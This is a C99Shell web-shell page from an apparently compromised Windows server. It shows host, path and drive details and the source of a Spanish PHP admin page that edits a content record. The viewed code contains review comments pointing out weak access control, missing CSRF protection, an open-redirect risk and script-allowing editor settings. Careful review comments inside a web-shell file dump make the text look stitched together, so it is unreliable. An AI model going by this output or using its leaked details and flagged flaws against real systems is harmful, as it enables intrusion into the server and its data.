!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\admin\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]


Viewing file:     62.php (8.83 KB)      -rw-rw-rw-
<?php require_once('../Connections/oa.php'); ?>
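<?php
// *** Logout the current user.
// Target of the "Salir" link. PHP_SELF can carry client-supplied path info,
// so this value must be HTML-escaped wherever it is echoed.
$FF_Logout = $_SERVER['PHP_SELF'] . "?FF_Logoutnow=1";

if (isset($_GET['FF_Logoutnow']) && $_GET['FF_Logoutnow'] == "1") {
  if (!session_id()) session_start();

  // session_unregister() and the $HTTP_*_VARS arrays were removed in PHP 5.4;
  // the login markers are cleared through $_SESSION instead.
  unset($_SESSION['MM_Username'], $_SESSION['MM_UserAuthorization']);

  $FF_logoutRedirectPage = "../index.php";
  if ($FF_logoutRedirectPage == "") $FF_logoutRedirectPage = $_SERVER['PHP_SELF'];

  // Redirect with the remaining URL parameters, minus the "FF_Logoutnow"
  // trigger. strpos() is compared with false so a "?" at offset 0 is not
  // mistaken for "no query string present".
  $FF_hasQuery = isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING'] != "";
  if (strpos($FF_logoutRedirectPage, "?") === false && $FF_hasQuery) {
    $FF_params = $_GET;
    unset($FF_params['FF_Logoutnow']);
    // http_build_query() encodes keys as well as values and copes with
    // array-valued parameters, which a bare urlencode($val) does not.
    $FF_newQS = http_build_query($FF_params, '', '&');
    if ($FF_newQS != "") $FF_logoutRedirectPage .= "?" . $FF_newQS;
  }

  header("Location: $FF_logoutRedirectPage");
  exit;
}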

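// *** Restrict Access To Page: Grant or deny access to this page
$FF_authorizedUsers=" ";
$FF_authFailedURL="login.php";
$FF_grantAccess=0;
if (!session_id()) session_start();

// $HTTP_SESSION_VARS, session_register() and session_unregister() were removed
// in PHP 5.4, so the session is read and written through $_SESSION.
if (isset($_SESSION['priorUrl'])) unset($_SESSION['priorUrl']);

// NOTE(review): the generated condition began with "true ||", so the role in
// MM_UserAuthorization and the $FF_authorizedUsers list were never consulted:
// every session that carries MM_Username is admitted. That behaviour is kept
// here unchanged; confirm it is what an administrative edit page should do.
if (isset($_SESSION['MM_Username'])) {
  $FF_grantAccess = 1;
}

if (!$FF_grantAccess) {
  // Remember where the visitor was headed. HTTP_HOST comes from the request
  // and is client-controlled. NOTE(review): whatever consumes priorUrl after
  // login is not visible here; it should validate the host before redirecting.
  $priorUrl = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];
  if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING'] != "") {
    $priorUrl .= "?" . $_SERVER['QUERY_STRING'];
  }
  $_SESSION['priorUrl'] = $priorUrl;

  // Append the "access denied" marker to the login URL.
  $FF_qsChar = (strpos($FF_authFailedURL, "?") !== false) ? "&" : "?";
  $FF_referrer = "Restricted Area";
  $FF_authFailedURL = $FF_authFailedURL . $FF_qsChar . "accessdenied=" . urlencode($FF_referrer);

  header("Location: $FF_authFailedURL");
  exit;
}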

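if (!function_exists("GetSQLValueString")) {
/**
 * Turn a request value into a literal for a hand-built SQL statement.
 *
 * The value is escaped with the mysql extension and then shaped by type:
 * "text" and "date" are wrapped in single quotes, "long"/"int" go through
 * intval(), "double" goes through doubleval() and is quoted, and "defined"
 * returns one of the two caller-supplied strings. An empty value becomes the
 * string "NULL" for every type except "defined".
 *
 * The switch has no default branch: an unrecognised $theType returns the
 * escaped text WITHOUT quotes, and escaping alone does not make a value safe
 * outside a quoted literal. Callers must pass one of the listed types.
 * The "defined" strings are returned as given, with no escaping.
 *
 * @param mixed  $theValue           Raw value, normally a request field.
 * @param string $theType            "text", "long", "int", "double", "date" or "defined".
 * @param string $theDefinedValue    Result for "defined" when the value is non-empty.
 * @param string $theNotDefinedValue Result for "defined" when the value is empty.
 * @return mixed SQL fragment ready to be placed into the statement.
 */
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
{
  // Undo magic-quotes escaping only where the runtime can still apply it;
  // the function_exists() guard keeps this working where it has been removed.
  if (function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) {
    $theValue = stripslashes($theValue);
  }

  // NOTE(review): called without a link argument, so the escaping follows
  // whichever connection the mysql extension opened last - presumably the one
  // from ../Connections/oa.php; confirm it is open before this runs.
  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);

  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}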

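// The form posts back to this same URL. Both parts come from the request, so
// the value has to be HTML-escaped where it is written into the action
// attribute.
$editFormAction = $_SERVER['PHP_SELF'];
if (isset($_SERVER['QUERY_STRING'])) {
  $editFormAction .= "?" . $_SERVER['QUERY_STRING'];
}

if ((isset($_POST["MM_update"])) && ($_POST["MM_update"] == "form1")) {
  // NOTE(review): nothing ties this POST to a form the page itself issued (no
  // per-session token), and idcontenido is taken from the request instead of
  // being pinned to the record this page displays.

  // The guard reads $_POST while the values were read from $HTTP_POST_VARS,
  // which PHP 5.4+ no longer populates. Read every field from $_POST, and
  // treat missing or non-string (array) input as empty.
  $updateInput = array();
  foreach (array('idcat', 'orden', 'tema', 'titulo', 'textoinicial', 'textocompleto', 'enlace', 'imagen', 'idcontenido') as $updateField) {
    $updateInput[$updateField] = (isset($_POST[$updateField]) && is_string($_POST[$updateField])) ? $_POST[$updateField] : "";
  }

  $updateSQL = sprintf("UPDATE contenidos SET idcat=%s, orden=%s, tema=%s, titulo=%s, textoinicial=%s, textocompleto=%s, enlace=%s, imagen=%s WHERE idcontenido=%s",
                       GetSQLValueString($updateInput['idcat'], "int"),
                       GetSQLValueString($updateInput['orden'], "int"),
                       GetSQLValueString($updateInput['tema'], "int"),
                       GetSQLValueString($updateInput['titulo'], "text"),
                       GetSQLValueString($updateInput['textoinicial'], "text"),
                       GetSQLValueString($updateInput['textocompleto'], "text"),
                       GetSQLValueString($updateInput['enlace'], "text"),
                       GetSQLValueString($updateInput['imagen'], "text"),
                       GetSQLValueString($updateInput['idcontenido'], "int"));

  mysql_select_db($database_oa, $oa);
  $Result1 = mysql_query($updateSQL, $oa);
  if (!$Result1) {
    // Keep the driver message in the server log; printing mysql_error() to the
    // browser discloses table and column names.
    error_log("62.php: UPDATE contenidos failed: " . mysql_error($oa));
    die("Database error.");
  }

  $updateGoTo = "62.php";
  if (isset($_SERVER['QUERY_STRING']) && $_SERVER['QUERY_STRING'] != "") {
    $updateGoTo .= (strpos($updateGoTo, '?') !== false) ? "&" : "?";
    $updateGoTo .= $_SERVER['QUERY_STRING'];
  }
  header(sprintf("Location: %s", $updateGoTo));
  // Stop after the redirect; without this the script went on to run the
  // SELECT and render the whole form behind the Location header.
  exit;
}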

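// Load the single record this page edits (id 62 is fixed in the query).
mysql_select_db($database_oa, $oa);
$query_rsCont = "SELECT * FROM contenidos WHERE idcontenido=62 ORDER BY titulo";
$rsCont = mysql_query($query_rsCont, $oa);
if (!$rsCont) {
  // Log the driver message server-side instead of printing it to the browser.
  error_log("62.php: SELECT contenidos failed: " . mysql_error($oa));
  die("Database error.");
}
// mysql_fetch_assoc() returns false when no row matches; the form below then
// renders with empty fields.
$row_rsCont = mysql_fetch_assoc($rsCont);
$totalRows_rsCont = mysql_num_rows($rsCont);
?>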
<html>
<head>
<title>ACTUALIZAR AUTORREGULACION</title>
<!-- tinyMCE -->
<script language="javascript" type="text/javascript" src="/tinymce/jscripts/tiny_mce/tiny_mce.js"></script>
<script language="javascript" type="text/javascript">
// Rich-text editor setup: every <textarea> on the page (mode "textareas")
// becomes a TinyMCE instance using the "advanced" theme with Spanish UI.
tinyMCE.init({
    theme : "advanced",
    language : "es",
    theme_advanced_resizing : true,
    // Hides toolbar buttons only. This is a UI restriction in the browser; the
    // PHP handler in this file SQL-escapes the posted markup but does not
    // filter it, so it is not a control over what gets stored.
    theme_advanced_disable : "cleanup,code,help,styleselect,cut,copy,paste",
    mode : "textareas",
    plugins : "table,advhr,advimage,emotions,iespell,insertdatetime,preview,flash,searchreplace,print,contextmenu,iwimg",
    theme_advanced_buttons1_add_before : "save,separator",
    theme_advanced_buttons1_add : "fontselect,fontsizeselect, iwimg",
    theme_advanced_buttons2_add : "separator,insertdate,inserttime,preview,zoom,separator,forecolor,backcolor",
    // NOTE(review): this key is defined again at the end of the object; in an
    // object literal the later definition wins, so this value is discarded.
    theme_advanced_buttons3_add : "emotions,iespell,flash,advhr,separator,print",
    theme_advanced_buttons2_add_before: "cut,copy,paste,separator,search,replace,separator",
    theme_advanced_buttons3_add_before : "tablecontrols,separator",
    theme_advanced_toolbar_location : "top",
    theme_advanced_toolbar_align : "center",
    theme_advanced_path_location : "bottom",
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S",
    // NOTE(review): the allow-list keeps the inline event-handler attributes
    // onclick, onmouseover and onmouseout, so script-bearing markup passes the
    // editor's cleanup. Where the stored content is later rendered is not
    // visible here; if it is shown to other visitors, drop these attributes
    // and sanitise on the server as well.
    extended_valid_elements : "a[name|href|target|title|onclick],img[class|src|border=0|alt|title|hspace|vspace|width|height|align|onmouseover|onmouseout|name],hr[class|width|size|noshade],font[face|size|color|style],span[class|align|style]",
    // NOTE(review): these three lists point at files under tinymce/example/ -
    // presumably the samples shipped with the editor; confirm they are meant
    // to be served in production.
    external_link_list_url : "tinymce/example/example_link_list.js",
    external_image_list_url : "tinymce/example/example_image_list.js",
    flash_external_list_url : "tinymce/example/example_flash_list.js",
relative_urls : false,
remove_script_host : true,
document_base_url : "http://observatorio.dama.gov.co/",
    // Effective value for buttons3_add (overrides the earlier definition).
    theme_advanced_buttons3_add : "pastetext,pasteword,selectall"
});
/**
 * Sample content hook: lower-cases the content for the "before" and "after"
 * phases and returns it untouched for any other phase name.
 * Not referenced by the tinyMCE.init() configuration in this file.
 *
 * @param {string} type    Phase name; "before" and "after" are handled.
 * @param {string} content Markup handed to the hook.
 * @returns {string} The (possibly lower-cased) content.
 */
function convertWord(type, content) {
    // Both phases run the same placeholder transformation, once before and
    // once after the editor's built-in cleanup.
    var isCleanupPhase = (type === "before" || type === "after");

    return isCleanupPhase ? content.toLowerCase() : content;
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

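<body>
<?php
// Every value written into the markup below is HTML-escaped at the point of
// output: $FF_Logout and $editFormAction are built from request data, and the
// $row_rsCont fields are whatever markup was last saved through this form.
// The charset is given explicitly to match the page's iso-8859-1 declaration,
// because the htmlspecialchars() default differs between PHP versions.
?>
<table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><a href="<?php echo htmlspecialchars($FF_Logout, ENT_QUOTES, 'ISO-8859-1'); ?>">Salir</a></td>
  </tr>
</table>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><form name="form1" method="POST" action="<?php echo htmlspecialchars($editFormAction, ENT_QUOTES, 'ISO-8859-1'); ?>">
        <p>
          <input name="idcontenido" type="hidden" id="idcontenido" value="<?php echo htmlspecialchars($row_rsCont['idcontenido'], ENT_QUOTES, 'ISO-8859-1'); ?>">
          <input name="idcat" type="hidden" id="idcat" value="<?php echo htmlspecialchars($row_rsCont['idcat'], ENT_QUOTES, 'ISO-8859-1'); ?>">
          <input name="orden" type="hidden" id="orden" value="<?php echo htmlspecialchars($row_rsCont['orden'], ENT_QUOTES, 'ISO-8859-1'); ?>">
          <input name="enlace" type="hidden" id="enlace" value="<?php echo htmlspecialchars($row_rsCont['enlace'], ENT_QUOTES, 'ISO-8859-1'); ?>">
          <input name="imagen" type="hidden" id="imagen" value="<?php echo htmlspecialchars($row_rsCont['imagen'], ENT_QUOTES, 'ISO-8859-1'); ?>">
        </p>
        <p>
          <input name="tema" type="text" id="tema" value="<?php echo htmlspecialchars($row_rsCont['tema'], ENT_QUOTES, 'ISO-8859-1'); ?>">
        </p>
        <p>
          <?php // Escaped so that stored markup such as a closing textarea tag cannot break out of the field; the browser decodes the entities before the editor reads the value. ?>
          <textarea name="titulo" cols="100" rows="8" id="titulo"><?php echo htmlspecialchars($row_rsCont['titulo'], ENT_QUOTES, 'ISO-8859-1'); ?></textarea>
        </p>
        <p>
          <textarea name="textoinicial" cols="100" rows="15" id="textoinicial"><?php echo htmlspecialchars($row_rsCont['textoinicial'], ENT_QUOTES, 'ISO-8859-1'); ?></textarea>
        </p>
        <p>
          <textarea name="textocompleto" cols="100" rows="15" id="textocompleto"><?php echo htmlspecialchars($row_rsCont['textocompleto'], ENT_QUOTES, 'ISO-8859-1'); ?></textarea>
          <br>
          <input type="submit" name="Submit" value="Enviar">
        </p>
        <input type="hidden" name="MM_update" value="form1">
      </form></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>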
<?php
// Release the result set that fed the form above.
mysql_free_result($rsCont);
?>


--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--